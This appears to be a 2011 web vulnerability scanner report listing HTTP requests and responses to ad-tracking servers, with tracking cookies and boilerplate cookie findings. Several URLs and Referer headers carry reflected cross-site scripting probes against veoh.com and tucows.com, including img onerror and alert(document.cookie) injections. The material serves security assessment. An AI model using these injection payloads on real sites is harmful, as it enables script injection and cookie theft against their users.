GET /pixel?id=582755&id=584778&id=584789&t=2 HTTP/1.1 Host: ad.yieldmanager.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: pc1="b!!!!#!#49P!!!*Z!##wb!+:d(!$9rJ!!H<)!?5%!)I-X?![:Z-!#[Q#!%(/.~~~~~~<ht]%~M.jTN"; BX=90d0t1d6iq2v7&b=3&s=9e; uid=uid=b167d032-2d75-11e0-89fa-003048d6d890&_hmacv=1&_salt=2074615246&_keyid=k1&_hmac=249585fedc0ca1193988128dced0dced5912c7fb; pv1="b!!!!7!#1xy!!E)$!$XwM!+kS,!$els!!mT-!?5%!'2gi6!w1K*!%4=%!$$#u!%_/^~~~~~<jbO@~~!#1y'!!E)$!$XwM!+kS,!$els!!mT-!?5%!'2gi6!w1K*!%4=%!$$#u!%_/^~~~~~<jbO@<l_ss~!#X@7!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@9!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@<!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#X@>!,x.^!$W@l!-g#y!$l:u!!!!$!?5%!%QkD1!wVd.!')sC!#rxb!%fi5~~~~~<k:[]<oNFg~!#dT5!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT7!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT9!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#dT<!,x.^!$W@l!/9uI!%*gh!!H<)!?5%!%QkD1!wVd.!')sC!#rxb!'*:S~~~~~<k:]D<oNGN~!#`,W!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,Z!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,]!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#`,_!,x.^!$W@l!.T97!$x>$!!mT-!?5%!%QkD1!wVd.!')sC!#rxb!%uNO~~~~~<k:^)<oNH3~!#3yC!!!%G!#4*B!/cr5!%:4s!!!%%!?5%!'k4o6!wVd.!$,gR!$a0[!'>es~~~~~<kI5G<o[wQ~!!x>#!!!/`!$C*N!.E9F!%7Dl!!!!$!?5%!%5XA1!w1K*!%oT=!!MLR!':'O~~~~~<lEIO<t:,n!!.vL!!uiR!!!+J!$>dt!.5=<!$rtW!!!!$!?5%!%R%P3!ZZ<)!%[hn!%nsh~~~~~~<lQj6~~!!0iu!!!/`!$=vN!03UD!$b[P!!!!$!?5%!%R%P3!ZmB)!%Z6*!%Z6<~~~~~~<lR)/~~!#Ic<!+*gd!$e)@!/cMg!%:[h!!!!$!?5%!%nBY4!wVd.!'Cuk!#^3*!'?JV~~~~~<lRY,~~!#N(B!!!+o!$%i1!,Y*D!$dhw!!!!$!?5%!%nBY4!ZZ<)!%X++!%]s!~~~~~~<lRY.<pfD8~"; ih="b!!!!B!(4vA!!!!#<kc#t!(mhO!!!!$<lEKI!*09R!!!!#<l/M+!*gS^!!!!#<kI:#!+/Wc!!!!#<jbN?!+:d(!!!!#<htX7!+:d=!!!!$<hu%0!+kS,!!!!#<jbO@!,Y*D!!!!#<lRY.!->h]!!!!$<lRYo!-g#y!!!!#<k:[]!.5=<!!!!#<lQj6!.E9F!!!!$<lEIO!.N)i!!!!#<htgq!.T97!!!!#<k:^)!.`.U!!!!'<kc#o!.tPr!!!!#<k`nL!/9uI!!!!#<k:]D!/H]-!!!!'<hu!d!/JXx!!!!$<lEWe!/J`3!!!!#<jbND!/cMg!!!!#<lRY,!/cr5!!!!#<kI5G!/o:O!!!!#<htU#!/poZ!!!!#<iLQk!/uG1!!!!#<jbOF!03UD!!!!#<lR)/!08r)!!!!$<lEWx!0>0V!!!!#<l/M.!0>0W!!!!#<lEK0"; vuday1=.Sexg5_x-bh5ryLshEiqN6hm(4Y4EY; bh="b!!!$M!!$ha!!DPb<lQiA!!'iQ!!!!#<htUa!!*$n!!!!#<htUa!!*10!!!!$<lQj,!!,D(!!!!%<lQj,!!-?2!!!!)<lQj,!!-G2!!!!#<lEa6!!-yu!!!!%<hu%6!!.+B!!!!%<hu%:!!0!j!!!!(<lQj,!!0+@!!!!$<jb`/!!04a!!!!$<jb`/!!1CD!!!!$<lP]!!!1Mv!!!!#<hfYB!!1SP!!!!$<ie@u!!2(x!!!!'<lQj,!!4<u!!!!(<lQj,!!4d6!!!!#<jbN=!!5i*!!!!#<himW!!<@x!!!!#<lS<(!!?VS!!DPb<lQiA!!J>N!!!!#<k2yx!!KNF!!ErC<k0fB!!L(*!!!!#<h67=!!L_w!!!!'<kdT!!!MZU!!!!#<lQiC!!Mr(!!ErC<k0fB!!ObA!!!!#<lQj,!!ObV!!!!#<lQj,!!OgU!!!!'<lQj,!!Z-E!!!!#<lQj,!!Z-G!!!!#<lQj,!!Z-L!!!!#<lQj,!!Zw`!!!!$<lQj,!!Zwb!!!!%<lQj,!!`Yp!!!!#<htUb!!fP+!!!!#<k`g7!!hqJ!!!!#<lP]!!!i0,!!!!#<lQj,!!iEC!!!!%<lQj,!!iEb!!!!(<lQj,!!i_9!!!!#<lQj,!!mDJ!!!!#<lQq8!!qOs!!!!#<htUb!!qOt!!!!#<htUb!!qOu!!!!#<htUb!!qu+!!!!#<lP]!!!r-X!!!!#<iMv0!!s6R!!!!#<htUb!!s9!!!!!#<jc#c!!u[u!!!!#<lS<(!!utd!!!!#<lS<(!!uu)!!!!#<lS<(!!v:e!!!!'<lQj,!!y]X!!!!#<k11E!!ys+!!!!$<h2ED!###G!!!!#<lP[k!###_!!!!#<j?lI!##lo!!!!#<jbO@!#$=X!!!!#<gj@R!#')-!!!!#<k2yx!#*VS!!!!#<jLPe!#*Xc!!!!#<lR(Q!#+]S!!!!'<lQj,!#-B#!!!!#<l.yn!#-vv!!!!$<iC/K!#.dO!!!!'<kdT!!#/:a!!!!#<lP]'!#/G2!!!!#<lQj,!#/G<!!!!#<lQj,!#/GO!!!!#<lQj,!#/yX!!!!#<k2yx!#0$b!!!!%<hu%0!#15#!!ErC<k0fB!#15$!!ErC<k0fB!#17@!!DPb<lQiA!#1=E!!!!#<kI4S!#2+>!!!!'<lS0M!#2`q!!!!#<jc#g!#2mR!!!!$<lEIO!#3pS!!!!$<lR(Q!#3pv!!!!$<lP]%!#5(X!!!!#<jLPe!#5(Y!!!!#<l.yn!#5(`!!!!#<jLPe!#5(b!!!!#<kI3?!#5(f!!!!#<kI4S!#5m!!!!!#<k2yx!#5mH!!!!#<k2yx!#7(x!!!!)<lQj,!#8.'!!!!#<lP]%!#8:i!!!!#<jc#c!#8?7!!!!#<lP]!!#8A2!!!!#<k11E!#:dW!!!!#<gj@R!#<T3!!!!#<jbNC!#F1H!!!!'<lS0M!#I=D!!!!#<kjhR!#Ic1!!!!#<lP]#!#K?%!!!!#<l8V)!#Kbb!!!!#<jLP/!#LI/!!!!#<k2yw!#LI0!!!!#<k2yw!#MP0!!!!#<jLPe!#MTC!!!!)<lQj5!#MTF!!!!)<lQj5!#MTH!!!!)<lQj5!#MTI!!!!)<lQj5!#MTJ!!!!)<lQj5!#NjS!!!!#<lI#*!#O>M!!DPb<lQiA!#OAV!!DPb<lQiA!#OAW!!DPb<lQiA!#OC2!!!!#<l/M+!#P<=!!!!#<kQRW!#PqQ!!!!#<lI#)!#PrV!!!!#<kQRW!#Q+o!!!!'<kdT!!#Qh8!!!!#<l.yn!#Ri/!!!!'<kdT!!#Rij!!!!'<kdT!!#SCj!!!!$<kcU!!#SCk!!!!$<kdT!!#SUp!!!!'<lQj,!#SjO!!!!#<gj@R!#SqW!!!!#<gj@R!#T#d!!!!#<k2yx!#T,d!!!!#<lR(Q!#TlE!!!!#<lP](!#TnE!!!!%<lQj5!#Tnp!!!!#<lP]#!#U5p!!!!#<gj@R!#UAO!!!!#<k2yx!#UDQ!!!!)<lQj5!#UL(!!!!%<lQW%!#W^8!!!!#<jem(!#Wb2!!DPb<lQiA!#X)y!!!!#<jem(!#X]+!!!!'<kdT!!#ZPo!!!!#<ie2`!#ZhT!!!!)<lQj,!#Zmf!!!!$<kT`F!#[25!!!!$<lQpR!#[L>!!!!#<lEa3!#]!g!!!!#<gj@R!#]%`!!!!#<lRYE!#]Ky!!!!#<gj@R!#^0$!!!!'<lQj,!#^0%!!!!'<lQj,!#^d6!!!!#<lRYE!#_0t!!!!%<kTb(!#`SX!!!!#<gj@R!#aCq!!!!#<lEa2!#aG>!!!!'<kdT!!#aM'!!!!#<kp_p!#av4!!!!#<iLQl!#b.n!!!!#<lR(Q!#b<[!!!!#<jHAu!#b<]!!!!#<jLPi!#b<^!!!!#<jHAu!#b<d!!!!#<jLPi!#b<e!!!!#<l.yn!#b<g!!!!#<kI4S!#b<i!!!!#<jLPe!#b<j!!!!#<jHAu!#b<w!!!!#<jHAu!#b=K!!!!#<l.yn!#b?A!!!!#<l.x@!#b](!!!!#<gj@R!#b`>!!!!#<jc#Y!#b`?!!!!#<jc#Y!#b`@!!!!#<jc#Y!#c8D!!!!#<gj@R!#cC!!!!!#<ie2`!#e@W!!!!#<k_2)!#ePa!!!!#<gj@R!#eR5!!!!#<gj@R!#eVe!!!!#<jHAu!#elE!!!!#<k3!!!#f93!!!!#<gj@R!#fBj!!!!(<lQj,!#fBk!!!!(<lQj,!#fBm!!!!(<lQj,!#fBn!!!!(<lQj,!#fBu!!!!#<gj@R!#fE=!!!!'<lQj,!#fG+!!!!(<lQj,!#fJ/!!!!#<gj@R!#fJw!!!!#<gj@R!#fK9!!!!#<gj@R!#fK>!!!!#<gj@R!#fdu!!!!#<k2yx!#fpW!!!!#<l/JY!#fpX!!!!#<l/JY!#fpY!!!!#<l/JY!#g'E!!!!#<gj@R!#g/7!!!!'<lQj,!#g<%!!!!#<gj@R!#gRx!!!!#<htU3!#g]7!!!!#<l.yn!#g]9!!!!#<kjl4!#h.N!!!!#<kL2n!#jS>!!!!#<k_Jy!#mP5!!!!#<lEa6!#mP6!!!!#<lEa6!#ndJ!!!!$<lP]'!#ndP!!!!$<lP]'!#nda!!!!$<lP]'!#ne$!!!!$<lP]'!#p]T!!!!$<kL2n!#sx#!!!!#<lQj5"
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:03:59 GMT Server: YTS/1.18.4 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT Set-Cookie: bh="b!!!$N!!$ha!!DPb<lQiA!!'iQ!!!!#<htUa!!*$n!!!!#<htUa!!*10!!!!$<lQj,!!,D(!!!!%<lQj,!!-?2!!!!)<lQj,!!-G2!!!!#<lEa6!!-yu!!!!%<hu%6!!.+B!!!!%<hu%:!!0!j!!!!(<lQj,!!0+@!!!!$<jb`/!!04a!!!!$<jb`/!!1CD!!!!$<lP]!!!1Mv!!!!#<hfYB!!1SP!!!!$<ie@u!!2(x!!!!'<lQj,!!4<u!!!!(<lQj,!!4d6!!!!#<jbN=!!5i*!!!!#<himW!!<@x!!!!#<lS<(!!?VS!!DPb<lQiA!!J>N!!!!#<k2yx!!KNF!!ErC<k0fB!!L(*!!!!#<h67=!!L_w!!!!'<kdT!!!MZU!!!!#<lQiC!!Mr(!!ErC<k0fB!!ObA!!!!#<lQj,!!ObV!!!!#<lQj,!!OgU!!!!'<lQj,!!Z-E!!!!#<lQj,!!Z-G!!!!#<lQj,!!Z-L!!!!#<lQj,!!Zw`!!!!$<lQj,!!Zwb!!!!%<lQj,!!`Yp!!!!#<htUb!!fP+!!!!#<k`g7!!hqJ!!!!#<lP]!!!i0,!!!!#<lQj,!!iEC!!!!%<lQj,!!iEb!!!!(<lQj,!!i_9!!!!#<lQj,!!mDJ!!!!#<lQq8!!qOs!!!!#<htUb!!qOt!!!!#<htUb!!qOu!!!!#<htUb!!qu+!!!!#<lP]!!!r-X!!!!#<iMv0!!s6R!!!!#<htUb!!s9!!!!!#<jc#c!!u[u!!!!$<lS@,!!utd!!!!$<lS@,!!uto!!!!#<lS@,!!uu)!!!!#<lS<(!!v:e!!!!'<lQj,!!y]X!!!!#<k11E!!ys+!!!!$<h2ED!###G!!!!#<lP[k!###_!!!!#<j?lI!##lo!!!!#<jbO@!#$=X!!!!#<gj@R!#')-!!!!#<k2yx!#*VS!!!!#<jLPe!#*Xc!!!!#<lR(Q!#+]S!!!!'<lQj,!#-B#!!!!#<l.yn!#-vv!!!!$<iC/K!#.dO!!!!'<kdT!!#/:a!!!!#<lP]'!#/G2!!!!#<lQj,!#/G<!!!!#<lQj,!#/GO!!!!#<lQj,!#/yX!!!!#<k2yx!#0$b!!!!%<hu%0!#15#!!ErC<k0fB!#15$!!ErC<k0fB!#17@!!DPb<lQiA!#1=E!!!!#<kI4S!#2+>!!!!'<lS0M!#2`q!!!!#<jc#g!#2mR!!!!$<lEIO!#3pS!!!!$<lR(Q!#3pv!!!!$<lP]%!#5(X!!!!#<jLPe!#5(Y!!!!#<l.yn!#5(`!!!!#<jLPe!#5(b!!!!#<kI3?!#5(f!!!!#<kI4S!#5m!!!!!#<k2yx!#5mH!!!!#<k2yx!#7(x!!!!)<lQj,!#8.'!!!!#<lP]%!#8:i!!!!#<jc#c!#8?7!!!!#<lP]!!#8A2!!!!#<k11E!#:dW!!!!#<gj@R!#<T3!!!!#<jbNC!#F1H!!!!'<lS0M!#I=D!!!!#<kjhR!#Ic1!!!!#<lP]#!#K?%!!!!#<l8V)!#Kbb!!!!#<jLP/!#LI/!!!!#<k2yw!#LI0!!!!#<k2yw!#MP0!!!!#<jLPe!#MTC!!!!)<lQj5!#MTF!!!!)<lQj5!#MTH!!!!)<lQj5!#MTI!!!!)<lQj5!#MTJ!!!!)<lQj5!#NjS!!!!#<lI#*!#O>M!!DPb<lQiA!#OAV!!DPb<lQiA!#OAW!!DPb<lQiA!#OC2!!!!#<l/M+!#P<=!!!!#<kQRW!#PqQ!!!!#<lI#)!#PrV!!!!#<kQRW!#Q+o!!!!'<kdT!!#Qh8!!!!#<l.yn!#Ri/!!!!'<kdT!!#Rij!!!!'<kdT!!#SCj!!!!$<kcU!!#SCk!!!!$<kdT!!#SUp!!!!'<lQj,!#SjO!!!!#<gj@R!#SqW!!!!#<gj@R!#T#d!!!!#<k2yx!#T,d!!!!#<lR(Q!#TlE!!!!#<lP](!#TnE!!!!%<lQj5!#Tnp!!!!#<lP]#!#U5p!!!!#<gj@R!#UAO!!!!#<k2yx!#UDQ!!!!)<lQj5!#UL(!!!!%<lQW%!#W^8!!!!#<jem(!#Wb2!!DPb<lQiA!#X)y!!!!#<jem(!#X]+!!!!'<kdT!!#ZPo!!!!#<ie2`!#ZhT!!!!)<lQj,!#Zmf!!!!$<kT`F!#[25!!!!$<lQpR!#[L>!!!!#<lEa3!#]!g!!!!#<gj@R!#]%`!!!!#<lRYE!#]Ky!!!!#<gj@R!#^0$!!!!'<lQj,!#^0%!!!!'<lQj,!#^d6!!!!#<lRYE!#_0t!!!!%<kTb(!#`SX!!!!#<gj@R!#aCq!!!!#<lEa2!#aG>!!!!'<kdT!!#aM'!!!!#<kp_p!#av4!!!!#<iLQl!#b.n!!!!#<lR(Q!#b<[!!!!#<jHAu!#b<]!!!!#<jLPi!#b<^!!!!#<jHAu!#b<d!!!!#<jLPi!#b<e!!!!#<l.yn!#b<g!!!!#<kI4S!#b<i!!!!#<jLPe!#b<j!!!!#<jHAu!#b<w!!!!#<jHAu!#b=K!!!!#<l.yn!#b?A!!!!#<l.x@!#b](!!!!#<gj@R!#b`>!!!!#<jc#Y!#b`?!!!!#<jc#Y!#b`@!!!!#<jc#Y!#c8D!!!!#<gj@R!#cC!!!!!#<ie2`!#e@W!!!!#<k_2)!#ePa!!!!#<gj@R!#eR5!!!!#<gj@R!#eVe!!!!#<jHAu!#elE!!!!#<k3!!!#f93!!!!#<gj@R!#fBj!!!!(<lQj,!#fBk!!!!(<lQj,!#fBm!!!!(<lQj,!#fBn!!!!(<lQj,!#fBu!!!!#<gj@R!#fE=!!!!'<lQj,!#fG+!!!!(<lQj,!#fJ/!!!!#<gj@R!#fJw!!!!#<gj@R!#fK9!!!!#<gj@R!#fK>!!!!#<gj@R!#fdu!!!!#<k2yx!#fpW!!!!#<l/JY!#fpX!!!!#<l/JY!#fpY!!!!#<l/JY!#g'E!!!!#<gj@R!#g/7!!!!'<lQj,!#g<%!!!!#<gj@R!#gRx!!!!#<htU3!#g]7!!!!#<l.yn!#g]9!!!!#<kjl4!#h.N!!!!#<kL2n!#jS>!!!!#<k_Jy!#mP5!!!!#<lEa6!#mP6!!!!#<lEa6!#ndJ!!!!$<lP]'!#ndP!!!!$<lP]'!#nda!!!!$<lP]'!#ne$!!!!$<lP]'!#p]T!!!!$<kL2n!#sx#!!!!#<lQj5"; path=/; expires=Sat, 02-Feb-2013 19:03:59 GMT Cache-Control: no-store Last-Modified: Thu, 03 Feb 2011 19:03:59 GMT Pragma: no-cache Content-Length: 43 Content-Type: image/gif Age: 0 Proxy-Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /beacons?callback=jsonp1296766389465 HTTP/1.1 Host: ads.adap.tv Proxy-Connection: keep-alive Referer: http://www.veoh.com/browse/videos/category/action_adventure2e455%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecd67645eb41/watch/v18978294NGnK88j8/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: creativeViews="{\"v\":1,\"views\":[{\"id\":2840,\"ts\":1296135287,\"cts\":null}]}"; rtbData0="key=tidaltv:value=56bdd173-7d00-46e9-8ce1-554488db4bb8:expiresAt=Mon+Mar+28+06%3A24%3A48+PDT+2011:32-Compatible=true,key=testbuyer2451:value=wwqd12345:expiresAt=Thu+Jan+27+11%3A14%3A25+PST+2011:32-Compatible=true"; unique_ad_source_impression="11427%2C14970%2C8641%2C11573%2C14265__TIME__2011-01-27+05%3A24%3A55"; asptvw1="as7037%2C2%2C2011-01-27%2F12-09-46+ap1894%2C1%2C2011-01-27%2F12-09-31"; adsrcvw1="15517%2C2%2C2011-01-28%2F11-09-46"; marketTransaction="true__TIME__2011-01-27+11%3A09%3A45"; adaptv_unique_user_cookie="4260041098738838008__TIME__2011-02-03+06%3A17%3A46"; audienceData="{\"v\":2,\"providers\":{\"2\":{\"f\":1298707200,\"e\":1298707200,\"s\":[292,293],\"a\":[]},\"10\":{\"f\":1299312000,\"e\":1299312000,\"s\":[],\"a\":[]},\"13\":{\"f\":1298707200,\"e\":1298707200,\"s\":[524],\"a\":[]},\"14\":{\"f\":1298707200,\"e\":1298707200,\"s\":[],\"a\":[{\"val\":\"000\",\"id\":5}]}}}"
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /cookie?pageUrl=http://www.veoh.com/browse/videos/category/action_adventure2e455%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecd67645eb41/watch/v18978294NGnK88j8/x22&isTop=true&callback=1 HTTP/1.1 Host: ads.adap.tv Proxy-Connection: keep-alive Referer: http://www.veoh.com/browse/videos/category/action_adventure2e455%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecd67645eb41/watch/v18978294NGnK88j8/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: creativeViews="{\"v\":1,\"views\":[{\"id\":2840,\"ts\":1296135287,\"cts\":null}]}"; rtbData0="key=tidaltv:value=56bdd173-7d00-46e9-8ce1-554488db4bb8:expiresAt=Mon+Mar+28+06%3A24%3A48+PDT+2011:32-Compatible=true,key=testbuyer2451:value=wwqd12345:expiresAt=Thu+Jan+27+11%3A14%3A25+PST+2011:32-Compatible=true"; unique_ad_source_impression="11427%2C14970%2C8641%2C11573%2C14265__TIME__2011-01-27+05%3A24%3A55"; asptvw1="as7037%2C2%2C2011-01-27%2F12-09-46+ap1894%2C1%2C2011-01-27%2F12-09-31"; adsrcvw1="15517%2C2%2C2011-01-28%2F11-09-46"; marketTransaction="true__TIME__2011-01-27+11%3A09%3A45"; adaptv_unique_user_cookie="4260041098738838008__TIME__2011-02-03+06%3A17%3A46"; audienceData="{\"v\":2,\"providers\":{\"2\":{\"f\":1298707200,\"e\":1298707200,\"s\":[292,293],\"a\":[]},\"10\":{\"f\":1299312000,\"e\":1299312000,\"s\":[],\"a\":[]},\"13\":{\"f\":1298707200,\"e\":1298707200,\"s\":[524],\"a\":[]},\"14\":{\"f\":1298707200,\"e\":1298707200,\"s\":[],\"a\":[{\"val\":\"000\",\"id\":5}]}}}"
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /favicon.ico HTTP/1.1 Host: ads.adap.tv Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: creativeViews="{\"v\":1,\"views\":[{\"id\":2840,\"ts\":1296135287,\"cts\":null}]}"; rtbData0="key=tidaltv:value=56bdd173-7d00-46e9-8ce1-554488db4bb8:expiresAt=Mon+Mar+28+06%3A24%3A48+PDT+2011:32-Compatible=true,key=testbuyer2451:value=wwqd12345:expiresAt=Thu+Jan+27+11%3A14%3A25+PST+2011:32-Compatible=true"; unique_ad_source_impression="11427%2C14970%2C8641%2C11573%2C14265__TIME__2011-01-27+05%3A24%3A55"; asptvw1="as7037%2C2%2C2011-01-27%2F12-09-46+ap1894%2C1%2C2011-01-27%2F12-09-31"; adsrcvw1="15517%2C2%2C2011-01-28%2F11-09-46"; marketTransaction="true__TIME__2011-01-27+11%3A09%3A45"; audienceData="{\"v\":2,\"providers\":{\"2\":{\"f\":1298707200,\"e\":1298707200,\"s\":[292,293],\"a\":[]},\"10\":{\"f\":1299312000,\"e\":1299312000,\"s\":[],\"a\":[]},\"13\":{\"f\":1298707200,\"e\":1298707200,\"s\":[524],\"a\":[]},\"14\":{\"f\":1298707200,\"e\":1298707200,\"s\":[],\"a\":[{\"val\":\"000\",\"id\":5}]}}}"; adaptv_unique_user_cookie="4260041098738838008__TIME__2011-02-03+13%3A39%3A06"
Response
HTTP/1.1 404 Not Found Cache-Control: must-revalidate,no-cache,no-store Set-Cookie: adaptv_unique_user_cookie="4260041098738838008__TIME__2011-02-03+17%3A50%3A36";Path=/;Domain=.adap.tv;Expires=Mon, 13-Oct-42 03:37:16 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 1376 Server: Jetty(6.1.22)
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /adserver/5JK3H6H2EC5.gif HTTP/1.1 Host: ads.cpxadroit.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://ad.yieldmanager.com/pixel?id=840761&t=2">here</a>.</h2> </body></html>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /openx/www/delivery/ajs.php?zoneid=15&test=false&cb=17332097841&charset=UTF-8&loc=http%3A//www.veoh.com/browse/videos/category/action_adventure2e455%253Cimg%2520src%253da%2520onerror%253dalert%281%29%253Ecd67645eb41/watch/v18978294NGnK88j8/x22&referer=http%3A//burp/show/11 HTTP/1.1 Host: ads.veoh.com Proxy-Connection: keep-alive Referer: http://www.veoh.com/browse/videos/category/action_adventure2e455%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecd67645eb41/watch/v18978294NGnK88j8/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: veohCookie="VisitorUID=F28E893B-ED80-1EAE-894D-FC564C4FF0AB&LastUpdate=03/Feb/2011:12:31:55 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmb=91933981.0.10.1296766388; __utmc=91933981; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /42/112156/287 HTTP/1.1 Host: affiliates.digitalriver.com Proxy-Connection: keep-alive Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Visit37.php?vt=V&id=94375989827&ref=http://ir.supermedia.com/&z=77201&purl=http://www.supermedia.com/support/contact-us/ HTTP/1.1 Host: app.insightgrit.com Proxy-Connection: keep-alive Referer: http://www.supermedia.com/support/contact-us/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=f52e78d070ddf6bd56f62f3cfbcdfbf2; IG94375=f52e78d070ddf6bd56f62f3cfbcdfbf2
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:09:09 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Thu, 03 Feb 2011 19:09:09 GMT Cache-Control: no-cache Pragma: no-cache Set-Cookie: IG94375=f52e78d070ddf6bd56f62f3cfbcdfbf2; expires=Mon, 04-Apr-2011 19:09:09 GMT; domain=app.insightgrit.com p3p: policyref="w3c/p3policy.xml#tracking", CP="IDC DSP COR CUR DEVa TAIi IVAi IVDi CONi OUR STP ONL UNI PUR INT" Content-Length: 49 Connection: close Content-Type: image/gif
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ssframework/adStreamJSController.htm?a=getadscheduleforcontent&format=vast&fetchads=preroll&ss_partnerId=626&ss_mediaId=v18978294NGnK88j8&ss_mediaTitle=MagadheeraSmartDesis.TK.mp4&ss_mediaCategories=&ss_mediaKeywords=&ss_mediaURL=videodetails&ss_pageURL=http%3A//www.veoh.com/browse/videos/category/action_adventure4957f%2522%253E%253Cimg%2520src%253da%2520onerror%253dalert%281%29%253Eb411440d815/watch/v18978294NGnK88j8/x26amp&ss_maxPrerollDuration=30&ss_width=480&ss_height=360&ss_asVersion=3&ss_mediaDescription=&ss_streamPageURL=http%3A//www.veoh.com/browse/videos/category/action_adventure4957f%2522%253E%253Cimg%2520src%253da%2520onerror%253dalert%281%29%253Eb411440d815/watch/v18978294NGnK88j8/x26amp&ss_acceptNonvideo=Y&jsa=Y HTTP/1.1 Host: app.scanscout.com Proxy-Connection: keep-alive Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 